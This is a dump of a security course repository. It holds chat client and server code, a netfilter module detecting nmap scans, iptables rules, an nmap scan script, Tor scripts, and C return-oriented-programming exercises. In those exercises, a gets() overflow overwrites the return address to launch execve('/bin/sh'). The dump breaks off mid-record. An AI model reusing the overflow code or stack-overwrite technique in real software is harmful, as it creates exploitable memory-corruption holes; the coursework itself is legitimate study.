"blob_id": "7e0b657534a17a6a0413364ba79fb7f7bd482bdd",
"content_id": "b1091050d78c104cede6da8676e0e4efcc0dd4a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1437,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 64,
"path": "/client.py",
"repo_name": "nickyfoster/pycryptochat",
"src_encoding": "UTF-8",
"text": "from PyQt5.QtWidgets import QApplication, QWidget, QFileDialog\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom gui import Ui_Form\nimport socket\nimport select\nimport sys\nimport re\n\"\"\"\ndef run(host, port):\n\tsender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\treceiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\treceiver.connect((host, port))\n\tsender.sendto(b'M1', (host, port))\n\tinput = [mdreceiver]\n\trunning = 1\n\twhile running:\n\t\trfd, wfr, efd = select.select(input, [], [])\n\t\timport msvcrt\n\t\tif msvcrt.kbhit(): ready_to_read.append(sys.stdin)\n\t\t\n\t\tfor s in rfd:\n\t\t\tif s == receiver:\n\t\t\t\tdata, addr = receiver.recvfrom(1024)\n\t\t\t\tprint(data)\n\t\t\telif s == sys.stdin:\n\t\t\t\tsender.sendto(sys.stdin.readline(),(host,port))\n\tsender.close()\n\treceiver.close()\n\nif __name__ == \"__main__\":\n\trun('localhost',5005)\n\n\n\n\n\"\"\"\nclass Main(QWidget):\n def __init__(self):\n super(Main, self).__init__()\n\n # Set up the user interface from Designer\n self.ui = Ui_Form()\n self.ui.setupUi(self)\n\n # Connect signals\n self.ui.pushButton.clicked.connect(self.send)\n \t\t\n\t\t\n\t\t# Set params\n self.ui.textEdit.setReadOnly(True)\n self.ui.textEdit.setFontPointSize(16)\n \n\n\n\t\t\n def send(self):\n self.ui.textEdit.append(self.ui.lineEdit.text())\n \n\t\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n ui = Main()\n ui.show()\n sys.exit(app.exec_())\n"
},
{
"alpha_fraction": 0.5477239489555359,
"alphanum_fraction": 0.577826738357544,
"avg_line_length": 22.482759475708008,
"blob_id": "61e3c4c35a2fa7d02f1688291644bfa95e45371d",
"content_id": "3fe326ef8b18b2c8ef0328284921c9171e4c00bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1362,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 58,
"path": "/clientRSA.py",
"repo_name": "nickyfoster/pycryptochat",
"src_encoding": "UTF-8",
"text": "import socket\nimport random\nimport sys\nfrom time import sleep\n\ndef encrypt(text, key):\n global encrypted\n encrypted = int.from_bytes(text.encode('utf-8'), byteorder='big')\n encrypted = encrypted + key\n return encrypted\n\ndef decrypt(encrypted, key):\n encrypted = encrypted - key\n s = encrypted.to_bytes(encrypted, length=len(strg), byteorder='big').decode('utf-8')\n return text\n\ndef crypt(s,host,port):\n y = 121\n p = 22344323423\n message = 'h172hdx120o'\n s.sendto(message.encode(),(host,port))\n alpha = int(s.recv(1024).decode('UTF-8'))\n\n secret = random.randint(500,1000)\n beta = str(int((pow(y,secret) % p)))\n\n s.sendto(beta.encode(),(host,port))\n\n key = pow(alpha,secret) % p\n print(\"KEY: \" +str(key))\n return key\n\n\ndef Main():\n host = 'localhost'\n port = int(sys.argv[1])\n key = 1\n\n s = socket.socket()\n s.connect((host, port))\n print(\"ASS!\")\n\n message = input(\"-> \")\n while message != 'q':\n if message == 'c':\n key = crypt(s,host,port)\n message = 'Done!'\n message = str(encrypt(message, key))\n s.sendto(message.encode(),(host,port))\n data = s.recv(1024)\n data = decrypt(int(data),key)\n\n print(\"Alice: \" + str(data.decode('UTF-8')))\n message = input(\"-> \")\n s.close()\n\nif __name__ == '__main__':\n Main()\n"
},
{
"alpha_fraction": 0.5067778825759888,
"alphanum_fraction": 0.5177267789840698,
"avg_line_length": 19.414894104003906,
"blob_id": "7c50229fdb17528723ff1c9200124273cd367a00",
"content_id": "4f9b35e3d3dee61859c034d1a184e4642f2af221",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1918,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 94,
"path": "/server.py",
"repo_name": "nickyfoster/pycryptochat",
"src_encoding": "UTF-8",
"text": "import socket\n\n\n\n\ndef run(host, port):\n\tserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\tserver.bind((host, port))\n\t\n\tclients = {}\n\t\n\twhile 1:\n\t\tdata, addr = server.recvfrom(65536)\n\t\t\n\t\tif addr[0] not in cleints.keys():\n\t\t\tif data not in people.values():\n\t\t\t\tpeople[addr[0]] = data\n\t\t\telse:\n\t\t\t\tpeople[addr[0]] = data + \"_\"\n\t\t\tcontinue\n\t\t\t\n\t\tdata = data.strip()\n\t\tif data != '':\n\t\t\tprint(f\"{addr}:{data}\")\n\t\t\tfor i in clients:\n\t\t\t\tserver.sendto(clients[addr[0]]+\": \" + data, (i,port))\n\t\tserv.close()\n\nif __name__ == \"__main__\":\n\trun('localhost', 5005)\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass Server:\n\tdef __init__(self, host=\"\", port=\"\", timeout=-1):\n\t\tself.host = host\n\t\tself.port = port\n\t\tself.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.sock.bind((host, port))\n\t\tself.recv_buffer = 4096\n\t\n\t\n\t# REVIEW\n\tdef recv(self):\n\t\twhile 1:\n ready_to_read,ready_to_write,in_error = select.select(SOCKET_LIST,[],[],0)\n\n for sock in ready_to_read:\n if sock == server_socket:\n sockfd, addr = server_socket.accept()\n SOCKET_LIST.append(sockfd)\n print \"Client (%s, %s) connected\" % addr\n broadcast(server_socket, sockfd, \"[%s:%s] entered our chatting room\\n\" % addr)\n\n\n else:\n try:\n data = sock.recv(RECV_BUFFER)\n if data:\n broadcast(server_socket, sock, \"\\r\" + '[' + str(sock.getpeername()) + '] ' + data)\n else:\n if sock in SOCKET_LIST:\n SOCKET_LIST.remove(sock)\n broadcast(server_socket, sock, \"Client (%s, %s) is offline\\n\" % addr)\n except:\n broadcast(server_socket, sock, \"Client (%s, %s) is offline\\n\" % addr)\n continue\n\t\n\tdef broadcast(server, sock, msg):\n\t\t\n\t\n\t\n\nclass Client:\n\"\"\""
}
] | 4 |
underhood31/NSSII
|
https://github.com/underhood31/NSSII
|
1dcdddad4ae7820afaff2ff02909c7b311b01f4c
|
1efd9784ada99edbe6cdda3d0f31251274ad90f2
|
9bf40c6dfa1d254e242f7be721b4370cf0cfc517
|
refs/heads/main
| 2023-05-18T06:01:46.065913 | 2021-06-08T18:55:12 | 2021-06-08T18:55:12 | 338,088,201 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5463917255401611,
"alphanum_fraction": 0.5498281717300415,
"avg_line_length": 12.857142448425293,
"blob_id": "80ab92acf0c3ace8f60f49ffddd2b5341cb569c7",
"content_id": "f8226d1b61934eb3901a70bbaae49f505a27d32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 291,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 21,
"path": "/Assignment_2/return_oriented_programming/overflow.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n\nvoid g()\n{\n printf(\"now inside g()!\\n\");\n}\n\n\nvoid f()\n{ \n printf(\"now inside f()!\\n\");\n // can only modify this section\n // cant call g(), maybe use g (pointer to function)\n}\n\nint main (int argc, char *argv[])\n{\n f();\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6412917971611023,
"alphanum_fraction": 0.644059956073761,
"avg_line_length": 27.339868545532227,
"blob_id": "4e5d24e21512fcce7e2f2ea3fa7423d027ded1f2",
"content_id": "aaa581b9880dd97f593a02a51b4b86d18ee7d230",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4335,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 153,
"path": "/Assignment_1/module/backup.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <linux/init.h>\n#include <linux/module.h>\n#include <linux/kernel.h>\n#include <linux/netfilter.h>\n#include <linux/netfilter_ipv4.h>\n#include <linux/ip.h>\n#include <linux/tcp.h>\n#include <net/netfilter/nf_conntrack.h>\n\nMODULE_LICENSE(\"GPL\");\nMODULE_AUTHOR(\"Manavjeet Singh\");\nMODULE_DESCRIPTION(\"A netfilter hook module.\");\nMODULE_VERSION(\"1.0\");\n\nstatic struct nf_hook_ops *my_nf_hook = NULL;\nstatic struct nf_hook_ops *my_nf_conntrack_hook = NULL;\n// static unsigned int hfunc(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {\n// \tstruct iphdr *iph;\n// \tstruct udphdr *udph;\n// \tif (!skb)\n// \t\treturn NF_ACCEPT;\n\n// \tiph = ip_hdr(skb);\n// \tif (iph->protocol == IPPROTO_UDP) {\n// \t\tudph = udp_hdr(skb);\n// \t\tif (ntohs(udph->dest) == 53) {\n// \t\t\treturn NF_ACCEPT;\n// \t\t}\n// \t}\n// \telse if (iph->protocol == IPPROTO_TCP) {\n// \t\treturn NF_ACCEPT;\n// \t}\n\t\n// \treturn NF_DROP;\n// }\n\nstatic unsigned int hook_pre_route(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {\n\tstruct iphdr *iph;\n\tstruct tcphdr *tcph;\n\tunsigned int option_length;\n\tif (!skb)\n\t\treturn NF_ACCEPT;\n\n\tiph = ip_hdr(skb);\n\tif (iph->protocol == IPPROTO_TCP) {\n\t\ttcph=tcp_hdr(skb);\n\n\t\tif (!tcph->syn && !tcph->rst && !tcph->psh && !tcph->ack && !tcph->urg && !tcph->ece && !tcph->cwr && !tcph->fin) {\n\t\t\tprintk(KERN_INFO \"TCP null scan packet detected\\n\");\n\t\t\treturn NF_DROP;\n\t\t}\n\t\telse if(!tcph->syn && !tcph->rst && tcph->psh && !tcph->ack && tcph->urg && !tcph->ece && !tcph->cwr && tcph->fin){\n\t\t\tprintk(KERN_INFO \"Xmas scan detected\\n\");\n\t\t\treturn NF_DROP;\n\n\t\t}\n\t\telse if (tcph->syn) {\n\n\t\t\t// option_length=tcp_optlen(skb);\n\t\t\t// if(option_length==4) {\n\t\t\t// \tprintk(KERN_INFO \"nmap half open TCP SYN packet found\");\n\t\t\t// \treturn NF_DROP;\n\t\t\t// }\n\t\t}\n\t\telse if (tcph->ack) {\n\t\t\t// option_length=tcp_optlen(skb);\n\t\t\t// printk(KERN_INFO \"option_length: %d\\n\", option_length);\n\n\t\t}\n\n\t}\n\n\t\n\treturn NF_ACCEPT;\n}\n\nstatic unsigned int hook_conntrack (void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {\n\tstruct iphdr *iph;\n\tstruct tcphdr *tcph;\n\tstruct nf_conn *ct;\n\tenum ip_conntrack_info conn_info;\n\n\tiph=ip_hdr(skb);\n\tif (iph->protocol == IPPROTO_TCP) {\n\t\tct=nf_ct_get(skb,&conn_info);\n\n\t\ttcph=tcp_hdr(skb);\n\n\t\tif (conn_info == IP_CT_ESTABLISHED ){\n\t\t\tprintk(KERN_INFO \"IP_CT_ESTABLISHED\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_RELATED ){\n\t\t\tprintk(KERN_INFO \"IP_CT_RELATED\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_NEW ){\n\t\t\tprintk(KERN_INFO \"IP_CT_NEW\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_IS_REPLY ){\n\t\t\tprintk(KERN_INFO \"IP_CT_IS_REPLY\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_ESTABLISHED_REPLY ){\n\t\t\tprintk(KERN_INFO \"IP_CT_ESTABLISHED_REPLY\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_RELATED_REPLY ){\n\t\t\tprintk(KERN_INFO \"IP_CT_RELATED_REPLY\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_NUMBER ){\n\t\t\tprintk(KERN_INFO \"IP_CT_NUMBER\\n\");\n\t\t}\n\t\telse{\n\t\t\tprintk(KERN_INFO \"NONE\\n\");\n\t\t}\n\t}\n\treturn NF_ACCEPT;\n}\n\nstatic int __init my_net_module_init(void) {\n\tprintk(KERN_INFO \"Initializing my netfilter module\\n\");\n\n\t/*Hook for which connection tracking is not required*/\n\tmy_nf_hook = (struct nf_hook_ops*) kzalloc(sizeof(struct nf_hook_ops), GFP_KERNEL);\n\n\tmy_nf_hook->hook \t\t\t= 
(nf_hookfn*)hook_pre_route;\t/* hook function */\n\tmy_nf_hook->hooknum \t\t= NF_INET_PRE_ROUTING;\t\t\t/* received packets */\n\tmy_nf_hook->pf \t\t\t\t= PF_INET;\t\t\t\t\t\t/* IPv4 */\n\tmy_nf_hook->priority \t\t= NF_IP_PRI_FIRST;\t\t\t\t/* max hook priority */\n\n\tnf_register_net_hook(&init_net, my_nf_hook);\n\n\t/*Hook which requires connection tracking using conntrack*/\n\tmy_nf_conntrack_hook = (struct nf_hook_ops*) kzalloc(sizeof(struct nf_hook_ops), GFP_KERNEL);\n\n\tmy_nf_conntrack_hook->hook \t\t= (nf_hookfn*)hook_conntrack;\t/* hook function */\n\tmy_nf_conntrack_hook->hooknum \t= NF_INET_PRE_ROUTING;\t\t\t/* received packets */\n\tmy_nf_conntrack_hook->pf \t\t= PF_INET;\t\t\t\t\t\t/* IPv4 */\n\tmy_nf_conntrack_hook->priority \t= NF_IP_PRI_CONNTRACK + 150;\t/* priority less than conntrack */\n\n\tnf_register_net_hook(&init_net, my_nf_conntrack_hook);\n\n\treturn 0;\n}\n\nstatic void __exit my_net_module_exit(void) {\n\n\tnf_unregister_net_hook(&init_net, my_nf_hook);\n\tnf_unregister_net_hook(&init_net, my_nf_conntrack_hook);\n\tkfree(my_nf_hook);\n\tkfree(my_nf_conntrack_hook);\n\tprintk(KERN_INFO \"Exiting my netfilter module\\n\");\n}\n\nmodule_init(my_net_module_init);\nmodule_exit(my_net_module_exit);"
},
{
"alpha_fraction": 0.6053984761238098,
"alphanum_fraction": 0.6844472885131836,
"avg_line_length": 43.42856979370117,
"blob_id": "9485e346024f7fb1cb58addc464d02dfc843615e",
"content_id": "ea927352230fc581cbf2ef789c47ba18ac821a02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1556,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 35,
"path": "/Exercise_1/VM_Files/VM2/firewall-conf",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n#-----Dropping requests from VM2\nsudo iptables -A OUTPUT -s 10.0.1.2/24 -j DROP\n\n#-------------\n\nsudo iptables -A FORWARD -i enp0s8 -o enp0s9 -p tcp --syn --dport 80 -m conntrack --ctstate NEW -j ACCEPT\nsudo iptables -A FORWARD -i enp0s8 -o enp0s9 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\n\nsudo iptables -t nat -A PREROUTING -i enp0s8 -p tcp --dport 80 -j DNAT --to-destination 10.0.1.1\nsudo iptables -t nat -A POSTROUTING -o enp0s9 -p tcp --dport 80 -d 10.0.1.1 -j SNAT --to-source 10.0.1.2\n\nsudo iptables -t nat -A PREROUTING -i enp0s9 -p tcp -j DNAT --to-destination 10.0.0.1\nsudo iptables -t nat -A POSTROUTING -o enp0s8 -p tcp -d 10.0.0.1 -j SNAT --to-source 10.0.0.2\n\nsudo iptables -A FORWARD -o enp0s8 -i enp0s9 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\n\n#--------------\n\nsudo iptables -A FORWARD -i enp0s8 -o enp0s9 -p tcp --syn --dport 443 -m conntrack --ctstate NEW -j ACCEPT\nsudo iptables -A FORWARD -i enp0s8 -o enp0s9 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\n\nsudo iptables -t nat -A PREROUTING -i enp0s8 -p tcp --dport 443 -j DNAT --to-destination 10.0.1.1\nsudo iptables -t nat -A POSTROUTING -o enp0s9 -p tcp --dport 443 -d 10.0.1.1 -j SNAT --to-source 10.0.1.2\n\nsudo iptables -t nat -A PREROUTING -i enp0s9 -p tcp -j DNAT --to-destination 10.0.0.1\nsudo iptables -t nat -A POSTROUTING -o enp0s8 -p tcp -d 10.0.0.1 -j SNAT --to-source 10.0.0.2\n\nsudo iptables -A FORWARD -o enp0s8 -i enp0s9 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\n\n#-------------\n\n\nsudo iptables -P FORWARD DROP\n\n"
},
{
"alpha_fraction": 0.4501992166042328,
"alphanum_fraction": 0.6972111463546753,
"avg_line_length": 30.375,
"blob_id": "4898be5040db3cc8faa8edb36c75e0f392d29ccf",
"content_id": "e3591857f66cdc88ec3ad7b57a6cbfa29dab0e90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 8,
"path": "/Exercise_1/VM_Files/VM2/start-network-VM2",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nip link set dev enp0s8 up\nip addr add 10.0.0.2/24 dev enp0s8 \nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.2\n\nip link set dev enp0s9 up\nip addr add 10.0.1.2/24 dev enp0s9 \nroute add -net 10.0.1.0 netmask 255.255.255.0 gw 10.0.1.2\n"
},
{
"alpha_fraction": 0.44680851697921753,
"alphanum_fraction": 0.4764437675476074,
"avg_line_length": 28.22222137451172,
"blob_id": "a28534ee6e06abaa0ddbdf54f9aaf57834235e0c",
"content_id": "dd87d9dff40b9254943e6fad418d8d24e6969334",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1316,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 45,
"path": "/Assignment_1/Submission/testscript.sh",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\necho \":::START:::\"\n#read -n 1 -r -s -p $'Make sure that kernel module is NOT inserted. Press enter to continue...'\n#echo \"\"\n#echo \"Running nmap commands to show sample output without loading the kernel module\"\n#echo \"\"\n#echo \"::nmap Null scan::\"\n#sudo nmap -sN 10.0.0.2\n#echo \"\"\n#echo \"--------------------------------------------------\"\n#echo \"\"\n#echo \"::nmap Fin scan::\"\n#sudo nmap -sF 10.0.0.2\n#echo \"\"\n#echo \"--------------------------------------------------\"\n#echo \"\"\n#echo \"::nmap Xmas scan::\"\n#sudo nmap -sX 10.0.0.2\n#echo \"\"\n#echo \"--------------------------------------------------\"\n#echo \"\"\nread -n 1 -r -s -p $'Load the kernel module in VM2. Press enter to continue...'\necho \"\"\necho \"::nmap Null scan::\"\nsudo nmap -sN 10.0.0.2\necho \"\"\nread -n 1 -r -s -p $'Check the syslog on VM2. Press enter to continue...'\necho \"\"\necho \"--------------------------------------------------\"\necho \"\"\necho \"::nmap Fin scan::\"\nsudo nmap -sF 10.0.0.2\necho \"\"\nread -n 1 -r -s -p $'Check the syslog on VM2. Press enter to continue...'\necho \"\"\necho \"--------------------------------------------------\"\necho \"\"\necho \"::nmap Xmas scan::\"\nsudo nmap -sX 10.0.0.2\necho \"\"\nread -n 1 -r -s -p $'Check the syslog on VM2. Press enter to continue...'\necho \"\"\necho \"--------------------------------------------------\"\necho \"\"\n\n"
},
{
"alpha_fraction": 0.7010676264762878,
"alphanum_fraction": 0.7829181551933289,
"avg_line_length": 69.25,
"blob_id": "2d08b2e0ce3de4f3984158b639eda1897952c882",
"content_id": "411c40124df14d13296d767ac84243330abcdcce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 281,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 4,
"path": "/Exercise_3/VM3-ex3/gen_cert.sh",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "openssl genrsa -out private-keyVM3.pem 2048\nopenssl rsa -in private-keyVM3.pem -pubout -out public-keyVM3.pem\nopenssl req -new -x509 -key private-keyVM3.pem -out certVM3.pem -days 360\nopenssl pkcs12 -export -in certVM3.pem -inkey private-keyVM3.pem -out certVM3.p12 -name certVM3\n"
},
{
"alpha_fraction": 0.7010676264762878,
"alphanum_fraction": 0.7829181551933289,
"avg_line_length": 69.25,
"blob_id": "ecc0b13214f7c4d656c0a6e510d6f1416411c08d",
"content_id": "fcc9af19d29bf1dbb260dd0b5da3cad8e1da0182",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 281,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 4,
"path": "/Exercise_3/VM2-Ex3/gen_cert.sh",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "openssl genrsa -out private-keyVM2.pem 2048\nopenssl rsa -in private-keyVM2.pem -pubout -out public-keyVM2.pem\nopenssl req -new -x509 -key private-keyVM2.pem -out certVM2.pem -days 360\nopenssl pkcs12 -export -in certVM2.pem -inkey private-keyVM2.pem -out certVM2.p12 -name certVM2\n"
},
{
"alpha_fraction": 0.5415472984313965,
"alphanum_fraction": 0.5625597238540649,
"avg_line_length": 28.08333396911621,
"blob_id": "a478ef056dcb1dbf5ccd5875706d0bd1b0b4dcc3",
"content_id": "09b82fefbbdfef735514a6efa0edcd6078bd3989",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1047,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 36,
"path": "/Assignment_2/return_oriented_programming/bonus.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <unistd.h>\n#include <stdlib.h>\nvoid called(unsigned long a, unsigned long b, unsigned long c){\n\tprintf(\"%ld %ld %ld\\n\",a,b,c);\n} \n\nint main(){\n\tchar name[64],*cptr;\n void *ptr;\n\tprintf(\"buffer address: %p\\n\", name); //print address of buffer\n puts(\"Enter text for name:\");\n gets(name);\n printf(\"content of buffer: %s\\n\", name);\n printf(\"execve of execve: %p\\n\", execve);\n \n memset(name,0,64);\n strcpy(name,\"hello world\\n\"); \n \n cptr = name+80+8;\n ptr = (unsigned long *)cptr;\n \n\t\n \n *((int*)(ptr+5*(sizeof(void*)))) = (int) 1; //first arg\n\t*((unsigned long*)(ptr+5*(sizeof(void*))+sizeof(int))) = (unsigned long*) name; //second //arg\n\t*((unsigned long*)(ptr+6*(sizeof(void*))+sizeof(int)))=(unsigned long)12;\t//third arg\n\t*((unsigned long *)(ptr+3*(sizeof(void*)))) = (unsigned long *)write;\n\t//OR if randomization is disabled\n\t// *(ptr+3) = (unsigned long *)0xf7e4a2b0;\n\t\n\n return 0;\n\n}\n"
},
{
"alpha_fraction": 0.7795275449752808,
"alphanum_fraction": 0.8110235929489136,
"avg_line_length": 62.5,
"blob_id": "4676c2f9ba0ffd9b2022f67c6d82f30d4528b001",
"content_id": "ed0a08fc032c0ad636c2a4386834b6625d7f8ce9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 2,
"path": "/README.md",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "# NSSII\nThis repo contains all the assignmets of Network and System Security Course II offered in winter semester 2021, IIITD.\n"
},
{
"alpha_fraction": 0.6519733667373657,
"alphanum_fraction": 0.6740133166313171,
"avg_line_length": 30.483871459960938,
"blob_id": "7478be86a36632b6d396aee7250d879694dab273",
"content_id": "4f3d772780db022622c4d6d1740ffe695b486f44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1951,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 62,
"path": "/Exercise_4/Part2/manual_tor.py",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "# https://stem.torproject.org/tutorials/to_russia_with_love.html\n# https://stackoverflow.com/questions/2473655/how-to-make-a-call-to-an-executable-from-python-script\nfrom stem.control import Controller\nimport stem\nimport stem.process\nimport getpass\nfrom stem.util import term\nimport subprocess\nfrom os import system\nimport os\nFILEPATH = \"/tmp/relay_fingerprints.txt\"\nPROG = \"gedit\"\n#https://metrics.torproject.org/rs.html#toprelays\nEXIT_FINGERPRINT = '18EAE30A4585BEB0D63D36BCFE3F9CA786CB55C7'\ndef print_bootstrap_lines(line):\n if \"Bootstrapped \" in line:\n print(term.format(line, term.Color.BLUE))\n\nif __name__ == '__main__':\n\ttor_p = stem.process.launch_tor(init_msg_handler = print_bootstrap_lines, torrc_path=\"./VM1/VM1\")\n\n\ttry: \n\t\twith Controller.from_port() as controller:\n\t\t\tauth_err=0\n\t\t\ttry:\n\t\t\t\tprint(\"pass: tor\")\n\t\t\t\tps=getpass.getpass(\"Controller password: \")\n\t\t\t\tcontroller.authenticate(password=ps)\n\t\t\texcept:\n\t\t\t\tprint(\"Cannot authenticate controller!\")\n\t\t\t\tauth_err=1\n\t\t\t\n\t\t\tif not auth_err:\n\n\t\t\t\t# print(\"Tor is running version %s\" % controller.get_version())\n\n\t\t\t\t# bytes_read = int(controller.get_info(\"traffic/read\"))\n\t\t\t\t# bytes_written = int(controller.get_info(\"traffic/written\"))\n\n\t\t\t\t# print(\"My Tor relay has read %s Mbytes and written %s.\" % (str(bytes_read/((1024**2))), str(bytes_written/(1024**2))))\n\n\t\t\t\tlength=int(input(\"Enter relay size:\")) \n\t\t\t\tstream=[]\n\t\t\t\tfor _r in range(length):\n\t\t\t\t\t_s=input(\"relay \"+str(_r+1)+\":\")\n\t\t\t\t\tstream.append(_s)\n\n\t\t\t\tprint(\"::Creating circuit\")\n\n\t\t\t\tcircuit_id = controller.new_circuit(stream, await_build = True)\n\n\t\t\t\tinput(\"press enter to exit...\")\n\t\t\t\t\n\t\t\t\t# ch=input(\"Do you want to kill tor? (y/n)\")\n\t\t\t\t# if(ch=='y' or ch=='Y'):\n\t\t\t\t# \tprint(\"::Killing tor\")\n\t\t\t\t# \targs= (\"systemctl\" , \"stop\", \"tor\")\n\t\t\t\t# \tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\texcept stem.SocketError as er:\n\t\tprint(\"Error: \", er, \"\\nTry starting tor service.\")\n\tfinally:\n\t\ttor_p.kill()"
},
{
"alpha_fraction": 0.5366120338439941,
"alphanum_fraction": 0.5519125461578369,
"avg_line_length": 24.41666603088379,
"blob_id": "f6c4d10c3f698d196aacc16342490d521993f5f7",
"content_id": "7755de16be27f42a488a65a929c12b726d2b4dbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 915,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 36,
"path": "/Assignment_2/return_oriented_programming/sample.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <unistd.h>\n#include <stdlib.h>\nvoid called(unsigned long a, unsigned long b, unsigned long c){\n\tprintf(\"%ld %ld %ld\\n\",a,b,c);\n} \n\nint main(){\n\tchar name[64],*cptr;\n unsigned long *ptr;\n\tprintf(\"buffer address: %p\\n\", name); //print address of buffer\n puts(\"Enter text for name:\");\n gets(name);\n printf(\"content of buffer: %s\\n\", name);\n printf(\"execve of execve: %p\\n\", execve);\n \n memset(name,0,64);\n strcpy(name,\"/bin/sh\"); \n \n cptr = name+80+8;\n ptr = (unsigned long *)cptr;\n \n\t\n \n *(ptr+5) = (unsigned long *) name; //first arg\n\t*(ptr+6) = (unsigned long*) NULL; //second //arg\n\t*(ptr+7)=(unsigned long *)NULL;\t//third arg\n\t// *(ptr+3) = (unsigned long *)execve;\n\t//OR if randomization is disabled\n\t*(ptr+3) = (unsigned long *)execve;\n\t\n\n return 0;\n\n}\n"
},
{
"alpha_fraction": 0.7688888907432556,
"alphanum_fraction": 0.7711111307144165,
"avg_line_length": 29.066667556762695,
"blob_id": "c78b7668c02d70548ef5c6b2c73f106e8f59d149",
"content_id": "b8c9604bcbed7167e2eb3040108f947e54e7ca5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 15,
"path": "/Exercise_4/Part2/VM1/run_tor.py",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "from stem.control import Controller\nimport stem\nimport stem.process\nimport getpass\nimport subprocess\nfrom os import system\nfrom stem.util import term\nimport os\ndef print_bootstrap_lines(line):\n if \"Bootstrapped \" in line:\n print(term.format(line, term.Color.BLUE))\n\n# tor_p = stem.process.launch_tor(init_msg_handler = print_bootstrap_lines)\ntor_p = stem.process.launch_tor(init_msg_handler = print_bootstrap_lines, torrc_path=\"VM1\")\ntor_p.kill()"
},
{
"alpha_fraction": 0.4263322949409485,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 38.875,
"blob_id": "49b78d6065d8bf6b6bde6f1f0199aae541382a3d",
"content_id": "1957c9739e310f08deb7806e4acd73b6afb50406",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 8,
"path": "/Exercise_1/VM_Files/VM1/start-network-VM1",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
